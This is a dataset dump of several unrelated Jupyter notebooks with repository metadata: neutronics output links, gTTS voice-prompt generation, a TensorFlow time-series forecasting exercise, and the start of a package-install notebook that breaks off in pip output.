"from IPython.display import FileLink\ndisplay(FileLink('heating_on_3D_mesh.vtk'))\ndisplay(FileLink('flux_on_3D_mesh.vtk'))\ndisplay(FileLink('tritium_production_on_3D_mesh.vtk'))\ndisplay(FileLink('flux_on_2D_mesh_xy.png'))\ndisplay(FileLink('flux_on_2D_mesh_xz.png'))\ndisplay(FileLink('flux_on_2D_mesh_yz.png'))\ndisplay(FileLink('heating_on_2D_mesh_xy.png'))\ndisplay(FileLink('heating_on_2D_mesh_xz.png'))\ndisplay(FileLink('heating_on_2D_mesh_yz.png'))\ndisplay(FileLink('tritium_production_on_2D_mesh_yz.png'))\ndisplay(FileLink('tritium_production_on_2D_mesh_xz.png'))\ndisplay(FileLink('tritium_production_on_2D_mesh_yz.png'))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
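A small illustrative note on the neutronics notebook above: the eight azimuth_placement_angle values for the blanket are hard-coded, and the 2D mesh tally results are only exposed as download links. The sketch below generates the same evenly spaced angles with NumPy and displays one of the exported png files inline; it assumes the simulation has already been run so that 'heating_on_2D_mesh_xy.png' exists, and the even spacing is just one possible choice, not part of the original notebook.

import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg

# Evenly spaced repeats around the Z axis: [0, 45, 90, 135, 180, 225, 270, 315]
angles = np.linspace(0, 360, 8, endpoint=False).tolist()
print(angles)

# Show one of the 2D mesh tally images written by neutronics_model.simulate()
img = mpimg.imread('heating_on_2D_mesh_xy.png')
plt.imshow(img)
plt.axis('off')
plt.show()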
cb2d2c1f8804a7c88be557e95553a73a96fa6fab | 12,067 | ipynb | Jupyter Notebook | src/.ipynb_checkpoints/tts-sandbox-checkpoint.ipynb | JosuVicente/facial_and_characteristics_recognition_with_speech_support | a297f475fe705c67c8b81a34ff9edc0234bad626 | [
"MIT"
] | 1 | 2019-09-02T10:08:05.000Z | 2019-09-02T10:08:05.000Z | src/.ipynb_checkpoints/tts-sandbox-checkpoint.ipynb | JosuVicente/facial_and_characteristics_recognition_with_speech_support | a297f475fe705c67c8b81a34ff9edc0234bad626 | [
"MIT"
] | null | null | null | src/.ipynb_checkpoints/tts-sandbox-checkpoint.ipynb | JosuVicente/facial_and_characteristics_recognition_with_speech_support | a297f475fe705c67c8b81a34ff9edc0234bad626 | [
"MIT"
] | null | null | null | 67.413408 | 2,146 | 0.635866 | [
[
[
"from gtts import gTTS\nLANG_PATH = '../lang/{0}/speech/{1}.mp3'\n\ntts = gTTS(text='Se ha detectado más de una persona, inténtelo de nuevo con una persona sólo por favor', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'more_than_one_face'))\ntts = gTTS(text='There appears to be more than one person, try again with one person only please', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'more_than_one_face'))\n\ntts = gTTS(text='ha sido guardado correctamente', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'saved'))\ntts = gTTS(text='has been saved correctly', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'saved'))\n\ntts = gTTS(text='diga el nombre de la persona detectada o cancelar después del pitido por favor', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'who'))\ntts = gTTS(text='say the name of the person detected or cancel after the beep please', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'who'))\n\ntts = gTTS(text='guardando', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'saving'))\ntts = gTTS(text='saving', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'saving'))\n\ntts = gTTS(text='un momento por favor', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'one_moment'))\ntts = gTTS(text='one moment please', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'one_moment'))\n\ntts = gTTS(text='lo siento, no he entendido bien', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'not_understand'))\ntts = gTTS(text='sorry, I didn´t catch that', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'not_understand'))\n\ntts = gTTS(text='cancelado', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'canceled'))\ntts = gTTS(text='canceled', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'canceled'))\n\ntts = gTTS(text='seleccione una opción. O diga: Comandos. Para oir una lista de comandos sonoros. O: Teclas. Para oir una lista de comandos de entrada.', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'choose'))\ntts = gTTS(text='select an option. Or say Options to hear a list of available commands. Or say Keys to hear a list of available keys', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'choose'))\n\ntts = gTTS(text='seleccione una opción', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'choose_short'))\ntts = gTTS(text='select an option', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'choose_short'))\n\ntts = gTTS(text='Diga: ¿Quién? Para obtener una descripción de las personas en la imagen. Diga: ¿Qué? Para obtener una descripción general de la imagen. Diga: Guardar. Para guardar en el sistema el nombre de la persona en la imagen. Diga: Idioma. Para cambiar el idioma al siguiente disponible. Diga: Cancelar. Para continuar o diga: Repetir: Para repetir las opciones. ', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'commands'))\ntts = gTTS(text='Say: Who. To get a description of the people in the image. Say: What. To get a general description of the image. Say: Save. To save the name of the person in the image. Say: Language. To change the language. Say: Cancel. To continue. Say: Repeat. To repeat the list of available options', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'commands'))\n\ntts = gTTS(text='Pulse \"A\". Para obtener una descripción de las personas en la imagen. Pulse \"Z\". Para obtener una descripción general de la imagen. Pulse \"S\". Para guardar en el sistema el nombre de la persona en la imagen. 
Pulse \"L\". Para cambiar el idioma al siguiente disponible. Pulse \"Q\". Para continuar o pulse: \"R\": Para repetir las opciones. ', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'keys'))\ntts = gTTS(text='Press \"A\". To get a description of the people in the image. Press \"Z\". To get a general description of the image. Press \"S\". To save the name of the person in the image. Press \"L\". To change the language. Press \"Q\". To continue. Press \"R\". To repeat the list of available options', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'keys'))\n\ntts = gTTS(text='Idioma cambiado a español', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'lang_change'))\ntts = gTTS(text='Language has been changed to english', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'lang_change'))\n\ntts = gTTS(text='De acuerdo', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'ok'))\ntts = gTTS(text='OK', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'ok'))\n\ntts = gTTS(text='Lo siento, no te he entendido', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'sorry_understand'))\ntts = gTTS(text='Sorry, I didn not get that', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'sorry_understand'))\n\ntts = gTTS(text='¿Quieres que repita las opciones disponibles?', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'repeat_options'))\ntts = gTTS(text='Do you want me to repeat the available options?', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'repeat_options'))\n\ntts = gTTS(text='Lo siento, no soy capaz de describir la imagen', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'no_image'))\ntts = gTTS(text='Sorry, I cannot understand what''s in the image', lang='en', slow=False)\ntts.save(LANG_PATH.format('en', 'no_image'))\n\n",
"_____no_output_____"
],
[
"from gtts import gTTS\ntts = gTTS(text='Pulse, A. Para obtener una descripción de las personas en la imagen. Pulse \"Z\". Para obtener una descripción general de la imagen. Pulse \"S\". Para guardar en el sistema el nombre de la persona en la imagen. Pulse \"L\". Para cambiar el idioma al siguiente disponible. Pulse \"Q\". Para continuar o pulse: \"R\": Para repetir las opciones. ', lang='es', slow=False)\ntts.save(LANG_PATH.format('es', 'keys'))",
"_____no_output_____"
],
[
"words = ['man', 'woman', 'angry', 'disgust', 'happy', 'neutral', 'sad', 'surprise']\nwords_es_h = ['hombre', 'mujer', 'enfadado', 'asqueado', 'contento', 'neutral', 'triste', 'sorprendido']\nwords_es_m = ['hombre', 'mujer', 'enfadada', 'asqueada', 'contenta', 'neutral', 'triste', 'sorprendida']\n\nfor i in range(len(words)):\n tts = gTTS(text=words[i], lang='en', slow=False)\n tts.save(\"en/\" + words[i] + \".wav\")\n tts = gTTS(text=words_es_h[i], lang='es', slow=False)\n tts.save(\"esh/\" + words[i] + \".wav\")\n tts = gTTS(text=words_es_m[i], lang='es', slow=False)\n tts.save(\"esm/\" + words[i] + \".wav\")\n ",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
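The text-to-speech notebook above repeats the same gTTS(...).save(...) pair for every phrase. A data-driven sketch that removes the duplication is shown below; the two entries in PHRASES are taken from the notebook, while the dict layout and the helper name are illustrative additions.

from gtts import gTTS

LANG_PATH = '../lang/{0}/speech/{1}.mp3'

# key -> {language code: phrase}; extend with the remaining phrases from the notebook above
PHRASES = {
    'saving': {'es': 'guardando', 'en': 'saving'},
    'canceled': {'es': 'cancelado', 'en': 'canceled'},
}

def save_phrases(phrases, path_template=LANG_PATH):
    # One mp3 per (language, key) pair, using the same gTTS call as the notebook
    for key, by_lang in phrases.items():
        for lang, text in by_lang.items():
            gTTS(text=text, lang=lang, slow=False).save(path_template.format(lang, key))

save_phrases(PHRASES)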
cb2d4c215c7d2dfa00d8cd2adcfc4fd3cca6911a | 584,363 | ipynb | Jupyter Notebook | Week 2/Time Series with Tensorflow/Course_4_Week_1_Exercise_Question.ipynb | atharvagj-ai/ML-Deep-Learning-Journey | c336354ebef7e9a159ae03873fc1612b48aa9161 | [
"MIT"
] | null | null | null | Week 2/Time Series with Tensorflow/Course_4_Week_1_Exercise_Question.ipynb | atharvagj-ai/ML-Deep-Learning-Journey | c336354ebef7e9a159ae03873fc1612b48aa9161 | [
"MIT"
] | null | null | null | Week 2/Time Series with Tensorflow/Course_4_Week_1_Exercise_Question.ipynb | atharvagj-ai/ML-Deep-Learning-Journey | c336354ebef7e9a159ae03873fc1612b48aa9161 | [
"MIT"
] | null | null | null | 773.990728 | 100,258 | 0.936637 | [
[
[
"<a href=\"https://colab.research.google.com/github/MoRebaie/Sequences-Time-Series-Prediction-in-Tensorflow/blob/master/Course_4_Week_1_Exercise_Question.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"!pip install tensorflow==2.0.0b1\n",
"Collecting tensorflow==2.0.0b1\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/29/6c/2c9a5c4d095c63c2fb37d20def0e4f92685f7aee9243d6aae25862694fd1/tensorflow-2.0.0b1-cp36-cp36m-manylinux1_x86_64.whl (87.9MB)\n\u001b[K |████████████████████████████████| 87.9MB 22.4MB/s \n\u001b[?25hRequirement already satisfied: keras-preprocessing>=1.0.5 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.1.0)\nRequirement already satisfied: google-pasta>=0.1.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (0.1.7)\nRequirement already satisfied: wrapt>=1.11.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.11.2)\nRequirement already satisfied: absl-py>=0.7.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (0.7.1)\nRequirement already satisfied: wheel>=0.26 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (0.33.4)\nRequirement already satisfied: gast>=0.2.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (0.2.2)\nRequirement already satisfied: termcolor>=1.1.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.1.0)\nRequirement already satisfied: grpcio>=1.8.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.15.0)\nRequirement already satisfied: numpy<2.0,>=1.14.5 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.16.4)\nCollecting tf-estimator-nightly<1.14.0.dev2019060502,>=1.14.0.dev2019060501 (from tensorflow==2.0.0b1)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/32/dd/99c47dd007dcf10d63fd895611b063732646f23059c618a373e85019eb0e/tf_estimator_nightly-1.14.0.dev2019060501-py2.py3-none-any.whl (496kB)\n\u001b[K |████████████████████████████████| 501kB 35.9MB/s \n\u001b[?25hRequirement already satisfied: keras-applications>=1.0.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.0.8)\nCollecting tb-nightly<1.14.0a20190604,>=1.14.0a20190603 (from tensorflow==2.0.0b1)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/a4/96/571b875cd81dda9d5dfa1422a4f9d749e67c0a8d4f4f0b33a4e5f5f35e27/tb_nightly-1.14.0a20190603-py3-none-any.whl (3.1MB)\n\u001b[K |████████████████████████████████| 3.1MB 40.0MB/s \n\u001b[?25hRequirement already satisfied: six>=1.10.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (1.12.0)\nRequirement already satisfied: protobuf>=3.6.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (3.7.1)\nRequirement already satisfied: astor>=0.6.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow==2.0.0b1) (0.8.0)\nRequirement already satisfied: h5py in /usr/local/lib/python3.6/dist-packages (from keras-applications>=1.0.6->tensorflow==2.0.0b1) (2.8.0)\nRequirement already satisfied: markdown>=2.6.8 in /usr/local/lib/python3.6/dist-packages (from tb-nightly<1.14.0a20190604,>=1.14.0a20190603->tensorflow==2.0.0b1) (3.1.1)\nRequirement already satisfied: setuptools>=41.0.0 in /usr/local/lib/python3.6/dist-packages (from tb-nightly<1.14.0a20190604,>=1.14.0a20190603->tensorflow==2.0.0b1) (41.0.1)\nRequirement already satisfied: werkzeug>=0.11.15 in /usr/local/lib/python3.6/dist-packages (from tb-nightly<1.14.0a20190604,>=1.14.0a20190603->tensorflow==2.0.0b1) (0.15.5)\nInstalling collected packages: tf-estimator-nightly, tb-nightly, tensorflow\n Found existing installation: tensorflow 1.14.0\n Uninstalling tensorflow-1.14.0:\n Successfully uninstalled tensorflow-1.14.0\nSuccessfully installed 
tb-nightly-1.14.0a20190603 tensorflow-2.0.0b1 tf-estimator-nightly-1.14.0.dev2019060501\n"
],
[
"import tensorflow as tf\nprint(tf.__version__)\n\n# EXPECTED OUTPUT\n# 2.0.0-beta1 (or later)\n",
"2.0.0-beta1\n"
],
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow import keras\n\ndef plot_series(time, series, format=\"-\", start=0, end=None):\n plt.plot(time[start:end], series[start:end], format)\n plt.xlabel(\"Time\")\n plt.ylabel(\"Value\")\n plt.grid(True)\n\ndef trend(time, slope=0):\n return slope * time\n\ndef seasonal_pattern(season_time):\n \"\"\"Just an arbitrary pattern, you can change it if you wish\"\"\"\n return np.where(season_time < 0.1,\n np.cos(season_time * 7 * np.pi),\n 1 / np.exp(5 * season_time))\n\ndef seasonality(time, period, amplitude=1, phase=0):\n \"\"\"Repeats the same pattern at each period\"\"\"\n season_time = ((time + phase) % period) / period\n return amplitude * seasonal_pattern(season_time)\n\ndef noise(time, noise_level=1, seed=None):\n rnd = np.random.RandomState(seed)\n return rnd.randn(len(time)) * noise_level\n\ntime = np.arange(4 * 365 + 1, dtype=\"float32\")\nbaseline = 10\nseries = trend(time, 0.1) \nbaseline = 10\namplitude = 40\nslope = 0.01\nnoise_level = 2\n\n# Create the series\nseries = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)\n# Update with noise\nseries += noise(time, noise_level, seed=42)\n\nplt.figure(figsize=(10, 6))\nplot_series(time, series)\nplt.show()\n\n# EXPECTED OUTPUT\n# Chart as in the screencast. First should have 5 distinctive 'peaks'",
"_____no_output_____"
]
],
[
[
"Now that we have the time series, let's split it so we can start forecasting",
"_____no_output_____"
]
],
[
[
"split_time = 1100 # YOUR CODE HERE\ntime_train = time[:split_time]\nx_train = series[:split_time]\ntime_valid = time[split_time:]\nx_valid = series[split_time:]\nplt.figure(figsize=(10, 6))\nplot_series(time_train, x_train)\nplt.show()\n\nplt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid)\nplt.show()\n\n# EXPECTED OUTPUT\n# Chart WITH 4 PEAKS between 50 and 65 and 3 troughs between -12 and 0\n# Chart with 2 Peaks, first at slightly above 60, last at a little more than that, should also have a single trough at about 0",
"_____no_output_____"
]
],
[
[
"# Naive Forecast",
"_____no_output_____"
]
],
[
[
"naive_forecast = series[split_time -1 : -1]#YOUR CODE HERE",
"_____no_output_____"
],
[
"plt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid)\nplot_series(time_valid, naive_forecast)\n\n# Expected output: Chart similar to above, but with forecast overlay",
"_____no_output_____"
]
],
[
[
"Let's zoom in on the start of the validation period:",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid, start = 0, end = 150)# YOUR CODE HERE\nplot_series(time_valid, naive_forecast, start = 1, end = 151)# YOUR CODE HERE\n\n# EXPECTED - Chart with X-Axis from 1100-1250 and Y Axes with series value and projections. Projections should be time stepped 1 unit 'after' series",
"_____no_output_____"
]
],
[
[
"Now let's compute the mean squared error and the mean absolute error between the forecasts and the predictions in the validation period:",
"_____no_output_____"
]
],
[
[
"print(keras.metrics.mean_squared_error(x_valid, naive_forecast).numpy()) # YOUR CODE HERE\nprint(keras.metrics.mean_absolute_error(x_valid, naive_forecast).numpy())# YOUR CODE HERE\n# Expected Output\n# 19.578304\n# 2.6011968",
"19.578304\n2.6011968\n"
]
],
[
[
"That's our baseline, now let's try a moving average:",
"_____no_output_____"
]
],
[
[
"def moving_average_forecast(series, window_size):\n \"\"\"Forecasts the mean of the last few values.\n If window_size=1, then this is equivalent to naive forecast\"\"\"\n forecast = []\n for time in range(len(series) - window_size):\n forecast.append(series[time:time + window_size].mean())\n return np.array(forecast)\n # YOUR CODE HERE",
"_____no_output_____"
],
[
"moving_avg = moving_average_forecast(series, 30)[split_time - 30:]# YOUR CODE HERE \n\nplt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid)\nplot_series(time_valid, moving_avg)\n \n# EXPECTED OUTPUT\n# CHart with time series from 1100->1450+ on X\n# Time series plotted\n# Moving average plotted over it",
"_____no_output_____"
],
[
"print(keras.metrics.mean_squared_error(x_valid, moving_avg).numpy())# YOUR CODE HERE\nprint(keras.metrics.mean_absolute_error(x_valid, moving_avg).numpy())# YOUR CODE HERE\n# EXPECTED OUTPUT\n# 65.786224\n# 4.3040023",
"65.786224\n4.3040023\n"
],
[
"diff_series = (series[365:] - series[:-365])# YOUR CODE HERE\ndiff_time = time[365:] # YOUR CODE HERE\n\nplt.figure(figsize=(10, 6))\nplot_series(diff_time, diff_series)\nplt.show()\n \n# EXPECETED OUTPUT: CHart with diffs",
"_____no_output_____"
]
],
[
[
"Great, the trend and seasonality seem to be gone, so now we can use the moving average:",
"_____no_output_____"
]
],
[
[
"diff_moving_avg = moving_average_forecast(diff_series, 50)[split_time - 365 - 50:] # YOUR CODE HERE\n\nplt.figure(figsize=(10, 6))\nplot_series(time_valid, diff_series[split_time - 365:]) # YOUR CODE HERE\nplot_series(time_valid, diff_moving_avg)# YOUR CODE HERE\nplt.show()\n \n# Expected output. Diff chart from 1100->1450 +\n# Overlaid with moving average",
"_____no_output_____"
]
],
[
[
"Now let's bring back the trend and seasonality by adding the past values from t – 365:",
"_____no_output_____"
]
],
[
[
"diff_moving_avg_plus_past = series[split_time - 365:-365] + diff_moving_avg # YOUR CODE HERE\n\nplt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid)# YOUR CODE HERE\nplot_series(time_valid, diff_moving_avg_plus_past)# YOUR CODE HERE\nplt.show()\n# Expected output: Chart from 1100->1450+ on X. Same chart as earlier for time series, but projection overlaid looks close in value to it",
"_____no_output_____"
],
[
"\nprint(keras.metrics.mean_squared_error(x_valid, diff_moving_avg_plus_past).numpy())# YOUR CODE HERE\nprint(keras.metrics.mean_absolute_error(x_valid, diff_moving_avg_plus_past).numpy())# YOUR CODE HERE\n# EXPECTED OUTPUT\n# 8.498155\n# 2.327179",
"8.498155\n2.327179\n"
]
],
[
[
"Better than naive forecast, good. However the forecasts look a bit too random, because we're just adding past values, which were noisy. Let's use a moving averaging on past values to remove some of the noise:",
"_____no_output_____"
]
],
[
[
"diff_moving_avg_plus_smooth_past = moving_average_forecast(series[split_time - 370:-360], 10) + diff_moving_avg # YOUR CODE HERE\n\nplt.figure(figsize=(10, 6))\nplot_series(time_valid, x_valid)# YOUR CODE HERE\nplot_series(time_valid, diff_moving_avg_plus_smooth_past)# YOUR CODE HERE\nplt.show()\n \n# EXPECTED OUTPUT:\n# Similar chart to above, but the overlaid projections are much smoother",
"_____no_output_____"
],
[
"print(keras.metrics.mean_squared_error(x_valid, diff_moving_avg_plus_smooth_past).numpy())# YOUR CODE HERE\nprint(keras.metrics.mean_absolute_error(x_valid, diff_moving_avg_plus_smooth_past).numpy())# YOUR CODE HERE\n# EXPECTED OUTPUT\n# 12.527958\n# 2.2034433",
"12.527958\n2.2034433\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
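The moving_average_forecast helper in the time-series notebook above loops in pure Python, which is slow for long series. A vectorised equivalent using a cumulative-sum trick is sketched below; it is written to return the same len(series) - window_size values as the loop, but it is an illustrative alternative, not part of the original exercise.

import numpy as np

def moving_average_forecast_fast(series, window_size):
    # Prepend a zero so cumsum[i] is the sum of the first i values,
    # then every window sum is a difference of two cumulative sums.
    cumsum = np.cumsum(np.insert(series, 0, 0.0))
    window_sums = cumsum[window_size:] - cumsum[:-window_size]
    # Drop the final window so the output length matches the loop-based version above.
    return window_sums[:-1] / window_size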
cb2d4e100ff0711f5e39d569d0d7668052f8bbc1 | 28,297 | ipynb | Jupyter Notebook | connpass20190729hands-on-work004.ipynb | matchbou/openql-notes | 3267bd3b162b0218a72457a58577782d298fe3a5 | [
"Apache-2.0"
] | 1 | 2019-07-29T11:35:16.000Z | 2019-07-29T11:35:16.000Z | connpass20190729hands-on-work004.ipynb | matchbou/openql-notes | 3267bd3b162b0218a72457a58577782d298fe3a5 | [
"Apache-2.0"
] | null | null | null | connpass20190729hands-on-work004.ipynb | matchbou/openql-notes | 3267bd3b162b0218a72457a58577782d298fe3a5 | [
"Apache-2.0"
] | null | null | null | 46.541118 | 390 | 0.534862 | [
[
[
"<a href=\"https://colab.research.google.com/github/matchbou/openql-notes/blob/master/connpass20190729hands-on-work004.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"!pip install imgaug==0.2.5",
"Collecting imgaug==0.2.5\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/d2/60/a06a48d85a7e9062f5870347a3e3e953da30b37928d43b380c949bca458a/imgaug-0.2.5.tar.gz (562kB)\n\u001b[K |████████████████████████████████| 563kB 5.0MB/s \n\u001b[?25hRequirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from imgaug==0.2.5) (1.3.0)\nRequirement already satisfied: scikit-image>=0.11.0 in /usr/local/lib/python3.6/dist-packages (from imgaug==0.2.5) (0.15.0)\nRequirement already satisfied: numpy>=1.7.0 in /usr/local/lib/python3.6/dist-packages (from imgaug==0.2.5) (1.16.4)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from imgaug==0.2.5) (1.12.0)\nRequirement already satisfied: matplotlib!=3.0.0,>=2.0.0 in /usr/local/lib/python3.6/dist-packages (from scikit-image>=0.11.0->imgaug==0.2.5) (3.0.3)\nRequirement already satisfied: networkx>=2.0 in /usr/local/lib/python3.6/dist-packages (from scikit-image>=0.11.0->imgaug==0.2.5) (2.3)\nRequirement already satisfied: imageio>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from scikit-image>=0.11.0->imgaug==0.2.5) (2.4.1)\nRequirement already satisfied: pillow>=4.3.0 in /usr/local/lib/python3.6/dist-packages (from scikit-image>=0.11.0->imgaug==0.2.5) (4.3.0)\nRequirement already satisfied: PyWavelets>=0.4.0 in /usr/local/lib/python3.6/dist-packages (from scikit-image>=0.11.0->imgaug==0.2.5) (1.0.3)\nRequirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib!=3.0.0,>=2.0.0->scikit-image>=0.11.0->imgaug==0.2.5) (2.4.0)\nRequirement already satisfied: python-dateutil>=2.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib!=3.0.0,>=2.0.0->scikit-image>=0.11.0->imgaug==0.2.5) (2.5.3)\nRequirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib!=3.0.0,>=2.0.0->scikit-image>=0.11.0->imgaug==0.2.5) (0.10.0)\nRequirement already satisfied: kiwisolver>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib!=3.0.0,>=2.0.0->scikit-image>=0.11.0->imgaug==0.2.5) (1.1.0)\nRequirement already satisfied: decorator>=4.3.0 in /usr/local/lib/python3.6/dist-packages (from networkx>=2.0->scikit-image>=0.11.0->imgaug==0.2.5) (4.4.0)\nRequirement already satisfied: olefile in /usr/local/lib/python3.6/dist-packages (from pillow>=4.3.0->scikit-image>=0.11.0->imgaug==0.2.5) (0.46)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/dist-packages (from kiwisolver>=1.0.1->matplotlib!=3.0.0,>=2.0.0->scikit-image>=0.11.0->imgaug==0.2.5) (41.0.1)\nBuilding wheels for collected packages: imgaug\n Building wheel for imgaug (setup.py) ... \u001b[?25l\u001b[?25hdone\n Stored in directory: /root/.cache/pip/wheels/31/48/c8/ca3345e8582a078de94243996e148377ef66fdb845557bae0b\nSuccessfully built imgaug\nInstalling collected packages: imgaug\n Found existing installation: imgaug 0.2.9\n Uninstalling imgaug-0.2.9:\n Successfully uninstalled imgaug-0.2.9\nSuccessfully installed imgaug-0.2.5\n"
],
[
"!pip install blueqat",
"Collecting blueqat\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/55/94/0e80926933ec8d69a5c98454b59db4c772a7d7d1699f574a55aa53271941/blueqat-0.3.8-py3-none-any.whl (46kB)\n\r\u001b[K |███████ | 10kB 12.5MB/s eta 0:00:01\r\u001b[K |██████████████▏ | 20kB 3.4MB/s eta 0:00:01\r\u001b[K |█████████████████████▏ | 30kB 4.9MB/s eta 0:00:01\r\u001b[K |████████████████████████████▎ | 40kB 3.2MB/s eta 0:00:01\r\u001b[K |████████████████████████████████| 51kB 3.5MB/s \n\u001b[?25hCollecting scipy~=1.1.0 (from blueqat)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/a8/0b/f163da98d3a01b3e0ef1cab8dd2123c34aee2bafbb1c5bffa354cc8a1730/scipy-1.1.0-cp36-cp36m-manylinux1_x86_64.whl (31.2MB)\n\u001b[K |████████████████████████████████| 31.2MB 1.3MB/s \n\u001b[?25hRequirement already satisfied: numpy~=1.12 in /usr/local/lib/python3.6/dist-packages (from blueqat) (1.16.4)\nInstalling collected packages: scipy, blueqat\n Found existing installation: scipy 1.3.0\n Uninstalling scipy-1.3.0:\n Successfully uninstalled scipy-1.3.0\nSuccessfully installed blueqat-0.3.8 scipy-1.1.0\n"
],
[
"!pip install wildqat",
"Collecting wildqat\n Downloading https://files.pythonhosted.org/packages/18/20/babcd0cabd564903f7dc5430a022bd5cf6cc9f440bdbb268318b9f261908/wildqat-1.1.9.tar.gz\nCollecting numpy==1.15.1 (from wildqat)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/fe/94/7049fed8373c52839c8cde619acaf2c9b83082b935e5aa8c0fa27a4a8bcc/numpy-1.15.1-cp36-cp36m-manylinux1_x86_64.whl (13.9MB)\n\u001b[K |████████████████████████████████| 13.9MB 5.7MB/s \n\u001b[?25hCollecting matplotlib==3.0.0 (from wildqat)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/ed/89/dd823436a5f8d5ca9304b51b554863bfd366ca84708d5812f5ee87c923bc/matplotlib-3.0.0-cp36-cp36m-manylinux1_x86_64.whl (12.8MB)\n\u001b[K |████████████████████████████████| 12.8MB 16.9MB/s \n\u001b[?25hCollecting networkx==2.2 (from wildqat)\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/f3/f4/7e20ef40b118478191cec0b58c3192f822cace858c19505c7670961b76b2/networkx-2.2.zip (1.7MB)\n\u001b[K |████████████████████████████████| 1.7MB 